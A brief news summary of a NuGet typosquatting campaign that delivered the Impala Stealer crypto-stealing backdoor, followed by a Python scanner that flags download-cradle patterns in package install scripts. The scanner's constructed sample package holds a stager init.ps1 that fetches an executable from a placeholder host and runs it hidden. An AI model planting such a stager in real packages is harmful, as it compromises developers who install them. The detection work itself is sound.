"Cryptocurrency Stealer Malware Distributed via 13 NuGet Packages"

Researchers have described the inner workings of the cryptocurrency-stealing malware that was spread via 13 malicious NuGet packages as part of a supply chain attack aimed at .NET developers. The typosquatting campaign, detailed by JFrog late last month, impersonated legitimate packages in order to execute PowerShell code designed to retrieve a follow-on binary from a hard-coded server. The two-stage attack leads to the deployment of Impala Stealer, a .NET-based persistent backdoor capable of gaining unauthorized access to cryptocurrency accounts. The payload used a rare obfuscation technique known as '.NET AoT compilation,' which is significantly more covert than using off-the-shelf obfuscators while still making the binary difficult to reverse engineer, according to JFrog. .NET AoT compilation is an optimization technique that compiles an app to native code ahead of time. This article continues to discuss the distribution of cryptocurrency stealer malware via 13 malicious NuGet packages.
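As an added defender-side example (not code from the article or from JFrog), the script below inspects a .nupkg for the PowerShell install hooks that NuGet clients have historically executed on package install and flags the first-stage pattern the article describes: a remote fetch from a hard-coded URL followed by hidden execution. The hook paths, the indicator patterns and the sample package are assumptions constructed for the example.

```python
"""Scan a .nupkg for PowerShell install hooks that fetch a remote binary."""
import io
import re
import zipfile

# Script paths NuGet clients have historically run on install/uninstall
# (assumed convention for this example); compared lower-cased.
HOOK_SCRIPTS = ("tools/init.ps1", "tools/install.ps1", "tools/uninstall.ps1")

# Download-cradle indicators: a remote fetch, a literal URL, hidden execution.
CRADLE_PATTERNS = {
    "web_request": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Invoke-RestMethod", re.I),
    "hardcoded_url": re.compile(r"https?://[\w.\-]+(?::\d+)?/[^\s'\"]*", re.I),
    "hidden_exec": re.compile(r"-WindowStyle\s+Hidden|-EncodedCommand|Start-Process", re.I),
}


def scan_nupkg(data: bytes) -> list:
    """Return one finding per hook script that contains cradle indicators."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if name.lower() not in HOOK_SCRIPTS:
                continue
            text = pkg.read(name).decode("utf-8", errors="replace")
            hits = {k: p.findall(text) for k, p in CRADLE_PATTERNS.items()}
            hits = {k: v for k, v in hits.items() if v}
            if hits:
                findings.append({"script": name, "indicators": hits})
    return findings


def build_sample_package(include_stager: bool = True) -> bytes:
    """Constructed sample .nupkg (not a real package); optional stager-style init.ps1."""
    stager = ("$u = 'http://stager.example.invalid/payload.exe'\n"   # placeholder host
              "Invoke-WebRequest -Uri $u -OutFile $env:TEMP\\p.exe\n"
              "Start-Process $env:TEMP\\p.exe -WindowStyle Hidden\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Sample.nuspec", "<package><metadata><id>Sample</id></metadata></package>")
        z.writestr("lib/netstandard2.0/Sample.dll", b"MZ")  # stand-in for a .NET assembly
        if include_stager:
            z.writestr("tools/init.ps1", stager)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_nupkg(build_sample_package()):
        print(f["script"], sorted(f["indicators"]))
```

Run over a package feed, a non-empty result is a review trigger, not proof of malice; legitimate packages do ship init scripts, so the URL and host should be checked against the publisher's known infrastructure.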

THN reports "Cryptocurrency Stealer Malware Distributed via 13 NuGet Packages"
